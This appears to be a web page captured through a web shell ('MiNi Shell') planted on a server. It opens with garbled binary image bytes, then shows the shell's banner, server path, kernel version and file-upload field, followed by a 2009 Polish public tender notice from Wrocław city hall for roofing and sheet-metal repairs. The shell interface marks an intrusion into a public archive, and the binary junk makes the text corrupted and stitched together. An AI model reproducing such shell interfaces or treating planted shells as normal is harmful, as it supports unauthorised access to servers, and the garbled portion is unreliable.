JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090126/8594-N-2009.html

<p class="kh_header"><b>Wrocław: Remonty bieżące w zakresie robót blacharsko - dekarskich w obiektach  Urzędu Miejskiego Wrocławia  znak postępowania -  ZP-PN-7-2009-WOU</b><br>
<b>Numer ogłoszenia: 8594 - 2009; data zamieszczenia: 26.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wrocław Urząd Miejski Wrocławia , pl. Nowy Targ 1/8, 50-141 Wrocław, woj. dolnośląskie, tel. 071 7779230, 7779231, faks 071 7779229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty bieżące w zakresie robót blacharsko - dekarskich w obiektach  Urzędu Miejskiego Wrocławia  znak postępowania -  ZP-PN-7-2009-WOU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie remontów bieżących w zakresie robót blacharsko - dekarskich na dachach obiektów Urzędu Miejskiego Wrocławia tj.: wykonania robót rozbiórkowych, pokrywczych - pokrycia dachowego, obróbek blacharsko-dekarskich, wymiany rur i rynien spustowych oraz robót towarzyszących. 
1.	Zakres robót obejmuje wykonanie:
1) Robót rozbiórkowych
-	rozbiórka pokryć dachowych z dachówki karpiówki,
-	rozbiórka starych obróbek blacharskich, rynien, rur spustowych,
-	wywóz gruzu i papy na odległość 15km.
2) Robót pokrywczych - wymiany i naprawy
-	pokrycia dachówki ceramicznej karpiówki,
-	przełożenia gąsiorów ceramicznych.
3) Obróbek blacharsko-dekarskich
-	z blachy cynkowo-tytanowej o gr.0,55mm,
-	podokienników z blachy miedzianej o gr.0,60mm.
4) Wymiany rynien i rur spustowych
-	rynien dachowych półokrągłych o śr.15cm z blachy cynkowo-tytanowej                   o gr.0,55mm oraz z blachy miedzianej o gr.0,60mm, rur spustowych okrągłych o śr.12cm i 15cm z blachy cynkowo-tytanowej oraz o śr.15cm z blachy miedzianej. 

5) Robót towarzyszących w szczególności
-	przemurowania kominów z cegieł,
-	wymiany łaceń dachu oraz deskowań,
-	dostawę i montaż płotków śniegowych,
-	czyszczenie rynien dachowych.

2.   Roboty remontowe w zakresie blacharsko-dekarskim, które są przedmiotem zamówienia mają  być wykonywane w oparciu o Przedmiar robót oraz Specyfikację Techniczną Wykonania i Odbioru Robót.
3. Wykonawca robót jest odpowiedzialny za jakość wykonywanych robót oraz zgodność wykonania z Prawem Budowlanym i obowiązującymi w tym zakresie przepisami, zaleceniami nadzoru inwestorskiego, obowiązującymi normami i warunkami technicznymi wykonania i odbioru robót oraz sztuką budowlaną.
4. W związku z tym, że prace będą wykonywane w obiektach czynnych Zamawiający zastrzega sobie następujące uwarunkowania realizacyjne:
-	godziny realizacji prac uciążliwych dla pracowników Urzędu Miejskiego od godz.16.00 do godz.22.00, oraz w sobotę  od godz. 7.00 do godz.22.00,
-	kolejność realizacji prac remontowych,
-	systematyczne porządkowanie miejsc wykonywania robót, tj. usuwanie gruzu,               i in. materiałów z rozbiórki,
-	natychmiastowe i skuteczne usuwanie wszelkich szkód.
5. Do obowiązków Wykonawcy należeć będzie również:
-	prowadzenie robót w sposób nieuciążliwy,
-	organizowanie i zagospodarowanie miejsca - terenu wykonywanych prac,
-	zagospodarowanie odpadów zgodnie z Ustawą o odpadach z dnia 27.04.2001r. Dz.U.  z 2007r. Nr 39 poz.251 z późniejszymi zmianami,
-	wykonanie niezbędnych odbiorów,
-	posiadać dla wbudowanych materiałów certyfikat na znak bezpieczeństwa, deklarację zgodności lub certyfikat zgodności z Polską Normą lub aprobatę techniczną. Jakość materiałów powinna odpowiadać wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie art.10 Prawa Budowlanego. 
6.	Roboty wykonywane będą na podstawie ustalonego zakresu rzeczowego robót, które będą określane w Kartach remontu oraz określonego terminu rozpoczęcia  i zakończenia robót. Karta remontu będzie sporządzana przez Inspektora nadzoru   i podpisywana przez Wykonawcę. Rozpoczęcie robót ma nastąpić w terminie dwóch dni po otrzymaniu od Zamawiającego Karty Remontu. 
7.	Za wykonanie poszczególnych robót ustala się rozliczenie ilościowo - obmiarowe - kosztorysem powykonawczym na podstawie ofertowych cen jednostkowych  i obmiarów, potwierdzonych przez osobę prowadzącą nadzór nad realizacją przedmiotu umowy w imieniu Zamawiającego.
Ceny jednostkowe robót przyjęte w kosztorysie ofertowym oraz składniki cenotwórcze są stałe przez cały okres realizacji umowy.
Roboty nie ujęte w przedmiarze robót zostaną rozliczone na podstawie wymienionych w kosztorysie ofertowym składników cenotwórczych. Dla materiałów budowlanych nie ujętych w kosztorysie ofertowym, ceny rynkowe przed dokonaniem zakupu muszą być zaakceptowane przez osobę prowadzącą nadzór nad realizacją przedmiotu umowy w imieniu Zamawiającego.
Wykonawca zobowiązany jest niezwłocznie zgłosić na piśmie Zamawiającemu fakt zakończenia robót celem dokonania odbioru. 
Podstawę do wystawienia faktury będzie stanowić Protokół odbioru robót -zakończonych elementów robót podpisany przez osobę prowadzącą nadzór nad realizacją przedmiotu umowy w imieniu Zamawiającego i Administratora obiektu przy udziale Kierownika robót oraz sprawdzony i zaakceptowany kosztorys powykonawczy przez osobę prowadzącą nadzór nad realizacją przedmiotu umowy w imieniu Zamawiającego.
Rozliczenie za wykonanie poszczególnych robót odbywać się będzie fakturami częściowymi wystawionymi w ciągu 30 dni od protokólarnego odbioru robót.
Wartość końcowa umowy będzie wynikać z rozliczenia robót wykonanych na dzień 31.12.2009r. z zastrzeżeniem, iż nie może ona przekroczyć określonej w umowie wartości zamówienia.
8.	Wykonawca udzieli co najmniej 12 miesięcznej gwarancji na wykonane roboty blacharsko  -dekarskie. Bieg terminu gwarancji rozpoczyna się w dniu następnym, po dokonanym odbiorze  robót.
9.	Szczegółowe warunki i zasady realizacji i rozliczania robót oraz obowiązki Wykonawcy określone są w Projekcie umowy 
10.Szczegółowy opis przedmiotu zamówienia w tym jego rodzaj i zakres zawarty jest w Specyfikacji Technicznej Wykonania i Odbioru Robót oraz w Przedmiarze Robót
11.	Wszystkie wymienione materiały w dokumentacji technicznej mogą być 
zastąpione przez inne równoważne -posiadające te same bądź lepsze parametry 
użytkowe, funkcjonalne i techniczne co urządzenia-materiały określone przez 
Zamawiającego. Obowiązek udowodnienia równoważności  zgodnie z art. 30 ust.
5 ustawy Pzp. należy do Wykonawcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.19.00-3, 45.26.13.00-7, 45.26.12.11-6, 45.26.14.20-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego ubiegać się mogą Wykonawcy, którzy spełniają warunki określone w przepisie art. 22 ust. 1 ustawy Pzp, a w szczególności:
1.	wykonali z należytą starannością w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia ( jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie ), co najmniej dwie roboty blacharsko - dekarskie, na kwotę o wartości nie mniejszej niż 50.000 PLN brutto dla każdej z robót; 
2.	dysponują lub będą dysponować kierownikiem budowy, który posiada uprawnienia budowlane  w specjalności konstrukcyjno-budowlanej w zakresie kierowania robotami oraz przynależy do Okręgowej Izby Inżynierów Budownictwa;
3.	posiadają aktualną polisę ubezpieczeniową lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 150.000 PLN.
  
Sposób dokonywania oceny spełniania warunków udziału w postępowaniu:
Na potwierdzenie spełnienia wymienionych powyżej warunków - Wykonawca dołączy do oferty oświadczenia i dokumenty wymienione poniżej. 
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla udokumentowania spełnienia wymaganych warunków udziału w postępowaniu, Wykonawcy dołączą do oferty następujące dokumenty: 
w formie oryginału:
1.   Oświadczenie Wykonawcy potwierdzające spełnienie warunków zawartych w art. 22 ust. 1 ustawy Pzp,

w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę -zgodnie z § 4.1. Rozporządzenia w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane:

2.  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert,

Odpis - zaświadczenie, o którym mowa w pkt. 2, musi zawierać aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy. Wykonawcy, którzy dokonali zmian w zakresie organów, które nie są uwidocznione w dokumencie rejestrowym winni złożyć dokumenty potwierdzające powołanie nowych osób w skład organu zarządzającego np. uchwała w sprawie powołania określonej osoby.

a)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 2, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	Dokument, o którym mowa w pkt. a powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w  pkt a, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapis pkt b stosuje się odpowiednio.
3. Wykaz zrealizowanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia -jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie-, co najmniej dwóch robót blacharsko - dekarskich, na kwotę o wartości minimum 50.000 PLN brutto dla każdej z tych robót; Do wykazu należy dołączyć dokumenty potwierdzające, że roboty te zostały  wykonane z należytą starannością  np. listy referencyjne.    
UWAGA: w przypadku realizacji robót budowlanych o złożonym zakresie, wśród których znajdują się żądane na potwierdzenie wymaganego doświadczenia ww. roboty,  Wykonawcy muszą w wykazie robót opisać dokładnie dotyczący ich zakres i kwoty.

4. Wykaz osób którymi dysponuje lub będzie dysponował wykonawca, które uczestniczyć będą w realizacji niniejszego zamówienia - a w szczególności co najmniej jednej osoby -tj. kierownika budowy-  posiadającej uprawnienia budowlane w specjalności konstrukcyjno - budowlanej w zakresie kierowania robotami i  przynależącej do Okręgowej Izby Inżynierów Budownictwa .
 Do wykazu należy dołączyć dokumenty potwierdzające posiadanie ww. uprawnień i aktualne zaświadczenie o przynależności do Okręgowej Izby Inżynierów Budownictwa.

5.  Aktualną polisę ubezpieczeniową, a w przypadku jej braku inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 150 000,00 złotych. 

Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązany jest złożyć samodzielnie - dokument wymieniony  w- pkt  2. 
4. Wszyscy Wykonawcy ubiegający się o udzielenie zamówienia, mogą złożyć wspólnie na jednym dokumencie:
-  oświadczenie z  pkt 1 mogą złożyć podpisane przez Pełnomocnika lub każdego z
    Wykonawców odrębnie, 
-   dokumenty wymienione  w pkt 3 i 4 - wystarczy dołączyć wykaz w formie jednego dokumentu dotyczącego wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wtedy należy wskazać w tzw. uwagach, którego Wykonawcy i w jakim zakresie dokument ten dotyczy. Dla dokumentów wymienionych w pkt. 3 i 4 spełnianie warunku będzie oceniane łącznie.    
5. Dokument z pkt. 5 tj. polisa ubezpieczeniowa może być złożony wspólnie lub odrębnie przez każdego z Wykonawców ubiegających się o udzielenie zamówienia. Oceniając spełnienie niniejszego warunku, Zamawiający będzie uwzględniał  łączną kwotę ubezpieczenia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Zamówień Publicznych
Urzędu Miejskiego Wrocławia
al. Kromera 44, II piętro, pokój 234
51-163 Wrocław.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2009 godzina 09:30, miejsce: Wydział Zamówień Publicznych
Urzędu Miejskiego Wrocławia
al. Kromera 44, II piętro, pokój 234
51-163 Wrocław	
Godziny pracy Urzędu Miejskiego Wrocławia: od poniedziałku do piątku 7.45-15.45..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com